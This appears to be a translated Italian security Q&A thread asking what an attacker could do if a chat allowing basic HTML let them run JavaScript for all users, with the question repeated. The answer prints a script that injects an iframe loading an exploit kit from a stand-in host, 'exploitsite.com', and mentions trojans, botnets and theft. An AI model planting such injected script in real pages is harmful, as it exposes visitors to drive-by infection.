Per una chat online che consente l'HTML di base, cosa succede se lasciano un modo aperto a un potenziale hacker di eseguire javascript su tutti gli utenti della chat?
Qual è la cosa peggiore che potrebbero fare?
Per una chat online che consente l'HTML di base, cosa succede se lasciano un modo aperto a un potenziale hacker di eseguire javascript su tutti gli utenti della chat?
Qual è la cosa peggiore che potrebbero fare?
Crea un nuovo iframe e carica il kit di exploit all'interno di iframe.
<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://exploitsite.com/");
ifrm.style.width = 640+"px";
ifrm.style.height = 480+"px";
document.body.appendChild(ifrm);
</script>
Infettare gli utenti con cavalli di Troia, usarli come robot, rubare i loro soldi, ecc ...
Leggi altre domande sui tag javascript web-browser web-application attacks attack-prevention